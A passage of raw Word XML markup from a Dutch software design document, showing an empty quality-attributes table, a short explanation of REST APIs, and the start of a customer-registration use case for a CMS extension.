            </w:pPr>
            <w:r w:rsidRPr="00063450">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Kwaliteit Attribuut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6940" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5FC7D0DE" w14:textId="03BAD07B" w:rsidR="00063450" w:rsidRDefault="00063450" w:rsidP="00063450">
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00063450">
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Omschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00063450" w14:paraId="1FE565FF" w14:textId="77777777" w:rsidTr="002E5A81">
        <w:trPr>
          <w:trHeight w:val="1320"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2109" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D36B287" w14:textId="33E4D1A7" w:rsidR="00063450" w:rsidRPr="005F01DF" w:rsidRDefault="003126C9" w:rsidP="002E5A81">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Availability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6940" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="766BC805" w14:textId="77777777" w:rsidR="00063450" w:rsidRDefault="00063450" w:rsidP="002856DD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00063450" w14:paraId="4DFEB639" w14:textId="77777777" w:rsidTr="002E5A81">
        <w:trPr>
          <w:trHeight w:val="1445"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2109" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E86BCFB" w14:textId="6C4BD2E6" w:rsidR="00063450" w:rsidRPr="005F01DF" w:rsidRDefault="003126C9" w:rsidP="002E5A81">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Interoperability</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6940" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="520CBEC0" w14:textId="77777777" w:rsidR="00063450" w:rsidRDefault="00063450" w:rsidP="002856DD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00063450" w14:paraId="3926FC90" w14:textId="77777777" w:rsidTr="002E5A81">
        <w:trPr>
          <w:trHeight w:val="1445"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2109" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3FA186D1" w14:textId="39A9BC52" w:rsidR="00063450" w:rsidRPr="005F01DF" w:rsidRDefault="00371569" w:rsidP="002E5A81">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Modifiability</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6940" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32BDDF29" w14:textId="77777777" w:rsidR="00063450" w:rsidRDefault="00063450" w:rsidP="002856DD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00063450" w14:paraId="47AD8648" w14:textId="77777777" w:rsidTr="002E5A81">
        <w:trPr>
          <w:trHeight w:val="1445"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2109" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27B403E5" w14:textId="3FAA69DC" w:rsidR="00063450" w:rsidRPr="005F01DF" w:rsidRDefault="00371569" w:rsidP="002E5A81">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Performance</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6940" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="40062B07" w14:textId="77777777" w:rsidR="00063450" w:rsidRDefault="00063450" w:rsidP="002856DD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00063450" w14:paraId="7C1F28F2" w14:textId="77777777" w:rsidTr="002E5A81">
        <w:trPr>
          <w:trHeight w:val="1320"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2109" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="670550B8" w14:textId="07ABEF1F" w:rsidR="00063450" w:rsidRPr="005F01DF" w:rsidRDefault="00371569" w:rsidP="002E5A81">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6940" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51F69782" w14:textId="77777777" w:rsidR="00063450" w:rsidRDefault="00063450" w:rsidP="002856DD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00063450" w14:paraId="510A908A" w14:textId="77777777" w:rsidTr="002E5A81">
        <w:trPr>
          <w:trHeight w:val="1445"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2109" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5272BA22" w14:textId="6A0135B3" w:rsidR="00063450" w:rsidRPr="005F01DF" w:rsidRDefault="00371569" w:rsidP="002E5A81">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Testability</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6940" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="165B8BB0" w14:textId="77777777" w:rsidR="00063450" w:rsidRDefault="00063450" w:rsidP="002856DD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00063450" w14:paraId="00AF129B" w14:textId="77777777" w:rsidTr="002E5A81">
        <w:trPr>
          <w:trHeight w:val="1320"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2109" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D57E16A" w14:textId="4B761222" w:rsidR="00063450" w:rsidRPr="005F01DF" w:rsidRDefault="00371569" w:rsidP="002E5A81">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Usability</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6940" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F6F6CD5" w14:textId="77777777" w:rsidR="00063450" w:rsidRDefault="00063450" w:rsidP="002856DD"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64F3A3CB" w14:textId="4ACA3235" w:rsidR="00226C75" w:rsidRDefault="00226C75" w:rsidP="002856DD">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5798B052" w14:textId="3192B9EE" w:rsidR="00B94C8B" w:rsidRDefault="00B94C8B" w:rsidP="00C10222">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc491022103"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>REST API</w:t>
      </w:r>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="17B10ED6" w14:textId="77777777" w:rsidR="00B94C8B" w:rsidRDefault="00B94C8B" w:rsidP="00B94C8B">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251877376" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7E92E16F" wp14:editId="63DF5A48">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>461645</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>4296410</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4345305" cy="269875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="31" name="Tekstvak 31"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4345305" cy="269875"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="3B76CCB9" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00073910" w:rsidRDefault="00CE4BB5" w:rsidP="00B94C8B">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figuur 4.1.4 – REST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92E16F" id="Tekstvak 31" o:spid="_x0000_s1122" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:36.35pt;margin-top:338.3pt;width:342.15pt;height:21.2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fk1TcCAABqBAAADgAAAGRycy9lMm9Eb2MueG1srFRNb9swDL0P2H8QdF+cj6ZLgzhFliLDgKAt&#10;kAw9K7IcC5VETVJiZ79+lGy3XbfTsItMkRSl9x7pxW2jFTkL5yWYnI4GQ0qE4VBIc8zp9/3m04wS&#10;H5gpmAIjcnoRnt4uP35Y1HYuxlCBKoQjWMT4eW1zWoVg51nmeSU08wOwwmCwBKdZwK07ZoVjNVbX&#10;KhsPh9dZDa6wDrjwHr13bZAuU/2yFDw8lKUXgaic4ttCWl1aD3HNlgs2PzpmK8m7Z7B/eIVm0uCl&#10;L6XuWGDk5OQfpbTkDjyUYcBBZ1CWkouEAdGMhu/Q7CpmRcKC5Hj7QpP/f2X5/fnREVnkdDKixDCN&#10;Gu3Fsw9n9kzQhfzU1s8xbWcxMTRfoEGde79HZ4TdlE7HLwIiGEemLy/siiYQjs6rydV0MpxSwjE2&#10;vr6ZfZ7GMtnraet8+CpAk2jk1KF6iVR23vrQpvYp8TIPShYbqVTcxMBaOXJmqHRdySC64r9lKRNz&#10;DcRTbcHoySLEFkq0QnNoEiWzmx7nAYoLwnfQNpC3fCPxwi3z4ZE57BhEjFMQHnApFdQ5hc6ipAL3&#10;82/+mI9CYpSSGjswp/7HiTlBifpmUOLYrr3heuPQG+ak14BQUTV8TTLxgAuqN0sH+gmHYxVvwRAz&#10;HO/KaejNdWjnAIeLi9UqJWFTWha2Zmd5LN0Tu2+emLOdLAEFvYe+N9n8nTptbtLHrk4BqU7SRWJb&#10;Fju+saGT+N3wxYl5u09Zr7+I5S8AAAD//wMAUEsDBBQABgAIAAAAIQDEiNyf4QAAAAoBAAAPAAAA&#10;ZHJzL2Rvd25yZXYueG1sTI+xTsMwEIZ3JN7BOiQWRJ2UYkOIU1UVDHSpSLt0c2M3DsR2ZDtteHuO&#10;CbY73af/vr9cTrYnZx1i552AfJYB0a7xqnOtgP3u7f4JSEzSKdl7pwV86wjL6vqqlIXyF/ehz3Vq&#10;CYa4WEgBJqWhoDQ2RlsZZ37QDm8nH6xMuIaWqiAvGG57Os8yRq3sHH4wctBro5uverQCtovD1tyN&#10;p9fNavEQ3vfjmn22tRC3N9PqBUjSU/qD4Vcf1aFCp6MfnYqkF8DnHEkBjDMGBAH+yLHcEYf8OQda&#10;lfR/heoHAAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZw8D7AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAA&#10;AFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAI7Jq4dcAAACUAQAACwAAAAAAAAAA&#10;AAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAktfk1TcCAABqBAAADgAAAAAAAAAA&#10;AAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEAxIjcn+EAAAAKAQAADwAAAAAA&#10;AAAAAAAAAACPBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAJ0FAAAAAA==&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="3B76CCB9" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00073910" w:rsidRDefault="00CE4BB5" w:rsidP="00B94C8B">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figuur 4.1.4 – REST API</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251876352" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0A9758D9" wp14:editId="6B382464">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>459105</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1782445</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4345305" cy="2491740"/>
            <wp:effectExtent l="19050" t="19050" r="17145" b="2286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t api update.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId92">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4345305" cy="24917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REST API, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RESTful</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Representational</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> state transfer, is een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stateless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webservice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> dat het http-protocol gebruikt om twee computersystemen met elkaar te laten communiceren op het internet. Deze </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webservice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> biedt de mogelijkheid voor een computersysteem om toegang te verkrijgen tot </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webresources</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zoals die meestal worden gerepresenteerd in JSON, HTML, XML. Voor het verkrijgen en manipuleren van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webresources</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> gebruikt een REST API de http </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>verbs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (werkwoorden) GET, PUT, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>POST</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">, DELETE. </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is van zichzelf een </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stateless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> protocol omdat er geen informatie wordt onthouden van elke </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> die gemaakt wordt. Dit betekent dat de server niet bijhoudt welke </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> erin </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hetverleden</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zijn gemaakt. Gezien er bij een veel gebruikte internetservice zoals Amazon.com duizenden </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>request</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> gemaakt kunnen worden, is het voor de performance ideaal. Dit legt ook uit waarom REST </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>API’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> zo populair zijn geworden bij grote bedrijven die </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>webservices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> aanbieden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4394471F" w14:textId="77777777" w:rsidR="00C97354" w:rsidRDefault="00C97354" w:rsidP="00D81245"/>
    <w:p w14:paraId="580539A4" w14:textId="77777777" w:rsidR="00C97354" w:rsidRDefault="00C97354">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="343B9EF9" w14:textId="5152B611" w:rsidR="00377148" w:rsidRDefault="004D0E93" w:rsidP="00C10222">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="60" w:name="_Toc491022104"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251867136" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="13846D92" wp14:editId="1834AA8C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-8255</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>353060</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5797550" cy="8464550"/>
                <wp:effectExtent l="0" t="0" r="19050" b="19050"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="61" name="Text Box 61"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5797550" cy="846455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B812EB4" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00C97354">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00AD7C14">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>UC-1: registreren klant</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5972C9F4" w14:textId="0CB33460" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00C97354">
                            <w:r w:rsidRPr="00AD7C14">
                              <w:t xml:space="preserve">De klant registreert zichzelf via de </w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r w:rsidRPr="00AD7C14">
                              <w:t>CMS extensie</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r w:rsidRPr="00AD7C14">
                              <w:t xml:space="preserve">. Dit wordt gedaan doormiddel van het invullen van een registratiescanner. </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7E044579" w14:textId="0F3906C8" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00C97354">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00AD7C14">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Acteurs</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="18C66C64" w14:textId="66336EA9" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00C97354">
                            <w:r w:rsidRPr="00AD7C14">
                              <w:t>Klant, API, Administrator</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="788AFAE8" w14:textId="4F889FED" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00C97354">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00AD7C14">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Preconditie</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="05E99F56" w14:textId="761B1B72" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="56"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r>
                              <w:t xml:space="preserve">De klant heeft de </w:t>
                            </w:r>
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>CMS extensie</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r w:rsidRPr="00AD7C14">
                              <w:t xml:space="preserve"> geïnstalleerd.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="601EA526" w14:textId="54EFAD9B" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00C97354">
                            <w:r w:rsidRPr="00AD7C14">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Postconditie</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6E9267F4" w14:textId="0FD1C94C" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="55"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00AD7C14">
                              <w:t>De klant krijgt een email bevestiging dat de registratie gelukt is.</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="1E5947A1" w14:textId="0806AE47" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00F801BE">
                            <w:pPr>
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00AD7C14">
                              <w:rPr>
                                <w:b/>
                              </w:rPr>
                              <w:t>Succes Scenario</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0358A1BA" w14:textId="3E91A852" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="57"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00AD7C14">
                              <w:t>De klant opent het registratieformulier</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="02BF3BCE" w14:textId="2E53C2E1" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="57"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00AD7C14">
                              <w:t>De CMS toont het registratieformulier</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3C46F6E3" w14:textId="06A8D4AB" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="57"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00AD7C14">
                              <w:t>De klant vult het registratieformulier in met de persoonlijke gegevens: naam, achternaam, adres, bedrijfsnaam, email</w:t>
                            </w:r>
                            <w:r>
                              <w:t>, telefoonnummer</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0F4ABD54" w14:textId="318E901C" w:rsidR="00CE4BB5" w:rsidRPr="00AD7C14" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="57"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00AD7C14">
                              <w:t>Het CMS gebruikt de API om het formulier in de database (tabel aanmeldingen)</w:t>
                            </w:r>
                            <w:r>
                              <w:t xml:space="preserve"> op te slaan</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="07C0390D" w14:textId="1721CC57" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00212048">
                            <w:pPr>
                              <w:pStyle w:val="ListParagraph"/>
                              <w:numPr>
                                <w:ilvl w:val="0"/>
                                <w:numId w:val="57"/>
                              </w:numPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00AD7C14">
                              <w:t xml:space="preserve">De administrator </w:t>
                            </w:r>
                            <w:r>
                              <w:t>verifieert of de geregistreerde account een authentieke klant is van S5 door contact met de klant op te zoeken via email of telefoon</w:t>
